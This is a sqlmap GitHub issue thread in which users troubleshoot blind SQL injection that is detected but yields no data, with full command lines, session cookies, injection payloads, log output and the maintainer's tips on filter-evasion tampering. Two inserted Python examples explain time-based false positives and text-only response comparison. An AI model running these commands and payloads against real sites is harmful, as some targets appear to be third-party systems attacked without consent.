
Why sqlmap does not take extract.. #448


Closed
SlottoCorleone opened this issue May 7, 2013 · 14 comments

@SlottoCorleone

Hi guys

I want to consult about my problem. In my tests sqlmap found an injection point, but I could not extract the database names or anything. It must be a firewall or something, I don't know, but that is my situation.

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=8gj5e2lo706l8r3q3qtgdk6192" --data="adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013%2015:22:03&toplam=50&urun=386*&userid=164107" --dbs --batch --no-cast

This is the situation

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[11:01:02] [INFO] resuming back-end DBMS 'mysql'
[11:01:02] [INFO] testing connection to the target URL
[11:01:03] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013 15:22:03&toplam=50&urun=386 AND 2875=2875&userid=164107

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013 15:22:03&toplam=50&urun=386 AND SLEEP(3)&userid=164107

[11:01:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[11:01:03] [INFO] fetching database names
[11:01:03] [INFO] fetching number of databases
[11:01:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:03] [INFO] retrieved:
[11:01:05] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[11:01:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[11:01:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:01:13] [ERROR] unable to retrieve the number of databases
[11:01:13] [INFO] falling back to current database
[11:01:13] [INFO] fetching current database
[11:01:13] [INFO] resumed: \n
available databases [1]:
[*]

@stamparm
Member

stamparm commented May 8, 2013

This is most probably a false positive. Are you able to retrieve anything with it? For example, do you get anything usable with --banner?

In case that you do, have you tried to use bigger --time-sec?

I can guess that you've lowered value for --time-sec to 3 in testing phase. My question is why? That way you are just raising probability of getting a false positive.
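The point stamparm makes about a small --time-sec is easy to see in numbers. The script below is an added example (not sqlmap's code and not its actual statistical model): it draws a constructed sample of round-trip times for a slow, noisy target and measures how often a response that was never delayed would still cross a naive "took longer than time-sec seconds" threshold. The latency model, the stall rate and the mean + k * stdev rule in `adaptive_threshold` are this example's assumptions.

```python
import random
import statistics


def baseline_latencies(n, mean=1.2, jitter=0.9, stall_rate=0.05, seed=7):
    """Constructed round-trip times (seconds) for a slow, noisy target:
    Gaussian jitter plus occasional multi-second stalls. Assumed model,
    not measurements from any real host."""
    rng = random.Random(seed)
    samples = []
    for _ in range(n):
        t = rng.gauss(mean, jitter)
        if rng.random() < stall_rate:
            t += rng.uniform(2.0, 6.0)   # an ordinary stall, no SLEEP() involved
        samples.append(max(0.05, t))
    return samples


def false_positive_rate(latencies, time_sec):
    """Share of un-delayed responses that a naive 'took longer than
    time_sec seconds' rule would wrongly count as a triggered delay."""
    return sum(1 for t in latencies if t >= time_sec) / len(latencies)


def compare_thresholds(latencies, candidates=(3, 5, 10)):
    """False-positive rate of the naive rule for several --time-sec values."""
    return {s: false_positive_rate(latencies, s) for s in candidates}


def adaptive_threshold(latencies, k=3.0):
    """Threshold derived from the baseline itself (mean + k * stdev).
    This mirrors the idea behind sqlmap's 'larger statistical model'
    warning in the log above; the constant k and the formula are
    assumptions of this example, not sqlmap internals."""
    return statistics.mean(latencies) + k * statistics.pstdev(latencies)


if __name__ == "__main__":
    lat = baseline_latencies(5000)
    for s, fp in compare_thresholds(lat).items():
        print(f"--time-sec={s:<2}  naive false-positive rate: {fp:.2%}")
    print(f"baseline-derived threshold: {adaptive_threshold(lat):.2f}s")
```

Run it and the rate for a 3-second threshold is visibly higher than for 10 seconds on the same baseline; a threshold derived from the observed jitter sits well above the noise, which is why a larger --time-sec (or letting the tool build its own model from dummy requests) reduces the chance that a slow page is mistaken for a triggered delay.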

@ghost ghost assigned stamparm May 8, 2013
@SlottoCorleone
Author

Hi dear stamparm

I have tried everything, all parameters, but it has been failing. I think the version is MySQL 3.

When I try urun=-1 and 91=91, or otherwise or 91=91, it gives me a "you can't do this" message, but on the other hand

and 91=73, or otherwise or 91=73, or any number that is not equal shows me a normal page. When I try the equal match manually it gives me a different message and redirects me to the main page.

I am going to try --banner and --time-sec=3 like you said.

What can we do with sqlmap for MySQL 3, do you have any recommendation? I am not actually sure about the database type and version, but I got that idea suddenly after my tests; those are the results.

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --time-sec=3

sqlmap/1.0-dev-03be419 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:53:18

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[08:53:18] [INFO] resuming back-end DBMS 'mysql'
[08:53:18] [INFO] testing connection to the target URL
[08:53:26] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND 1439=1439&userid=36366

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND SLEEP(3)&userid=36366

[08:53:26] [INFO] the back-end DBMS is MySQL
[08:53:26] [INFO] fetching banner
[08:53:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:53:26] [INFO] retrieved:
[09:02:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[09:04:23] [INFO] retrieved:
[09:04:23] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

web application technology: Apache
back-end DBMS: MySQL 5.0.11
[09:05:20] [INFO] fetching banner
[09:05:20] [INFO] retrieved:
[09:15:04] [INFO] retrieved:
[09:15:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None

What more can I do? I don't know, I really need your help.

@stamparm
Member

stamparm commented May 8, 2013

That SLEEP function was added in MySQL 5.0.12. So, in your case, if positive, you are dealing with MySQL 5.

You said:
and 91=73, or otherwise or 91=73, or any number that is not equal shows me a normal page. When I try the equal match manually it gives me a different message and redirects me to the main page.

In that case, you need to make sqlmap work for boolean SQLi. You can try to use --text-only --technique=B
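What --text-only changes is the comparison, not the requests: responses to the "true" and "false" conditions are compared on their visible text, so markup that changes on every request (tokens, timestamps) no longer makes every page look different. The following is an added example, not sqlmap's code or its actual similarity algorithm: it builds constructed responses in the style of this thread ("PROBLEM 4" on the true page, "PROBLEM 2" on the false page, with per-request noise in the HTML) and shows the three verdicts a reviewer of such results needs to tell apart. The `page`, `verdict` and `text_only` helpers, the sample bodies and the exact-match rule are assumptions of the example; sqlmap itself uses a similarity ratio rather than exact comparison.

```python
import re


def text_only(html):
    """Keep only visible text: drop script/style blocks, strip tags,
    collapse whitespace. Simplified model of what --text-only compares."""
    text = re.sub(r"<(script|style)\b.*?</\1>", " ", html, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    return re.sub(r"\s+", " ", text).strip()


def page(message, token, stamp):
    """Constructed HTML response: the per-request noise (token, timestamp)
    lives only in markup, the status message is the visible text."""
    return (f'<html><head><meta name="csrf" content="{token}"></head>\n'
            f'<body><div id="hdr" data-ts="{stamp}"><h1>Siparis</h1></div>\n'
            f'<p class="msg">{message}</p>\n'
            f'<script>var sid="{token}";</script></body></html>')


# Constructed sample bodies: two responses per condition, each with its own noise.
TRUE_BODIES = [page("PROBLEM 4", "a1f3" * 8, "2013-05-09 10:01:02"),
               page("PROBLEM 4", "7c0e" * 8, "2013-05-09 10:01:05")]
FALSE_BODIES = [page("PROBLEM 2", "b9d2" * 8, "2013-05-09 10:01:03"),
                page("PROBLEM 2", "e44a" * 8, "2013-05-09 10:01:06")]


def RAW(body):
    """Identity normaliser: compare full HTML, as without --text-only."""
    return body


def verdict(true_bodies, false_bodies, normalize=text_only):
    """'dynamic'        - responses to the same condition differ, so the
                          comparison cannot be trusted as-is;
       'false-positive' - true and false conditions are indistinguishable;
       'consistent'     - each condition maps to one stable page and the
                          two differ (the case a real boolean-based
                          blind injection produces)."""
    t = {normalize(b) for b in true_bodies}
    f = {normalize(b) for b in false_bodies}
    if len(t) != 1 or len(f) != 1:
        return "dynamic"
    if t == f:
        return "false-positive"
    return "consistent"


if __name__ == "__main__":
    print("raw HTML     :", verdict(TRUE_BODIES, FALSE_BODIES, normalize=RAW))
    print("text only    :", verdict(TRUE_BODIES, FALSE_BODIES))
    print("same page x2 :", verdict(TRUE_BODIES, TRUE_BODIES))
```

On the raw bodies the verdict is "dynamic" because the token and timestamp differ between requests; after `text_only` the same bodies are "consistent", which is the situation later in this thread where the true page always reads "PROBLEM 4" and the false page "PROBLEM 2". Feeding the same page for both conditions yields "false-positive", the outcome stamparm suspects in the reports further down.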

@SlottoCorleone
Author

Thanks for fast reply

Yes, I guess you are right, it's SQLi. I tried what you said, it's still failing.

./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --text-only --technique=B

sqlmap/1.0-dev-03be419 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:34:37

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[09:34:37] [INFO] resuming back-end DBMS 'mysql'
[09:34:38] [INFO] testing connection to the target URL
[09:34:41] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause

Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND 1439=1439&userid=36366

[09:34:41] [INFO] the back-end DBMS is MySQL
[09:34:41] [INFO] fetching banner
[09:34:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:34:41] [INFO] retrieved:
[09:38:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

web application technology: Apache
back-end DBMS: MySQL 5.0.11
[09:42:40] [INFO] fetching banner
[09:42:40] [INFO] retrieved:
[09:44:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None

@stamparm
Member

stamparm commented May 8, 2013

Ok. This proves that the site is vulnerable. It's highly improbable that both time-based and boolean-based blind are false positives here.

I would suggest you use --no-cast. In case that this still fails, you are probably dealing with a site having some kind of protection. Here I can't help you a lot. You'll need to find out whether there is anything that could help you out here.

For example, maybe this helps:
--tamper=between

@SlottoCorleone
Author

Okay, I finally found a result. I think I must do it manually because I am having problems with authentication, I guess. I checked it and found the exact time manually, miroslav: I did and sleep(33) and the server waited for 33 seconds; after I did it as and sleep(20) it waited 20 seconds. Now I tried manually: and 91=91 gives me the true page, and after and 91=73 (or any number) gives me another page, but the page comes back HTTP 200, just the errors are different. For example the TRUE page always gives this result:

"PROBLEM 4", but the FALSE position always gives "PROBLEM 2" as the text.

Also, can you give me the manual syntax, stamparm? I can check it immediately. For example, how can I find the version or something manually? I tried AND substring(version(),1,1)=5 and also 4; it gives me "PROBLEM 2". I mean, how can I be sure whether there is an injection or not?
May I send mail for more information, stamparm, if you don't mind?

Thanks

@stamparm
Member

stamparm commented May 9, 2013

Can you please send me a traffic.txt file to [email protected] resulting from the following run:

python sqlmap.py -u "....." -t traffic.txt --technique=BEU --text-only

@ankerfeng

Have you fixed that problem? I have the same; for example, the following output:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: version
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: partnerid=yundaapp&version=3.68.00') AND 5998=5998 AND ('DeEj'='DeEj&data=eyJzdGFydFRpbWUiOjE0MTQ4MjI2MjA2MDcsImVuZFRpbWUiOjE0MTY1NTA2MjA2MDcsImN1c3Rv
bWVySWQiOiJlNzQyNmYwNTYzZWE0MzZhOTY2N2ZlZWE3YzdhOTczMyJ9

&request=orderQuery&validation=082f85da214aa1b909a7fada54672c28

[14:54:20] [INFO] the back-end DBMS is MySQL
[14:54:20] [INFO] fetching banner
[14:54:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:54:20] [INFO] retrieved:
[14:54:21] [INFO] heuristics detected web page charset 'ascii'
dIIEE### IE%#$ J IIEE##%* IEE)OIEJ ### IEE## IE(EE%%%## %EEE%IIJ IIEEEIJ IEJ %J %* %%EEz K%S ###%EEEEIIES %J %#/#%EE%#%z IIEIEEE%## IIE%%%F EEAE
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: MySQL 5

banner:

�dIIEE###���
IE%#$ J
IIEE##%*
IEE)OIEJ��������###���
IEE##��
IE(EE%%%##������%EEE%IIJ

IIEEEIJ��IEJ�������%J�%*�%%EEz�K%S�###%EEEEIIES�%J����%#/#%EE%#%z   IIEIEEE%##��������  IIE%%%F
EEAE

[14:57:41] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 943 times
[14:57:41] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/mobi.yundasys.com'

@stamparm
Member

@imfenghui in your case it certainly seems like a false positive. "Fix" it with --flush-session.

@ankerfeng

Can I send a traffic.txt file to [email protected]?

@ankerfeng

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: POST
Parameter: partnerid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: partnerid=yundaapp AND 5393=5393&version=3.68.00&data=eyJzdGFydFRpbWUiOjE0MTQ4MjI2MjA2MDcsImVuZFRpbWUiOjE0MTY1NTA2MjA2MDcsImN1c3Rv
bWVySWQiOiJlNzQyNmYwNTYzZWE0MzZhOTY2N2ZlZWE3YzdhOTczMyJ9

&request=orderQuery&validation=082f85da214aa1b909a7fada54672c28

[15:31:42] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:31:42] [INFO] the back-end DBMS is MySQL
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: MySQL 5.0.11
[15:31:42] [INFO] fetching database names
[15:31:42] [INFO] fetching number of databases
[15:31:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:31:42] [INFO] retrieved:
[15:31:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:31:43] [ERROR] unable to retrieve the number of databases
[15:31:43] [INFO] falling back to current database
[15:31:43] [INFO] fetching current database
[15:31:43] [INFO] retrieved:
[15:31:43] [INFO] heuristics detected web page charset 'ascii'

@stamparm
Member

@imfenghui I wouldn't see one thing usable as it's a boolean-based blind. Also, a payload like partnerid=yundaapp AND 5393... for sure looks like a false positive.

@ankerfeng

Thanks for your advice, I think it's a false positive.

@angelz12

Nope, I got the same.

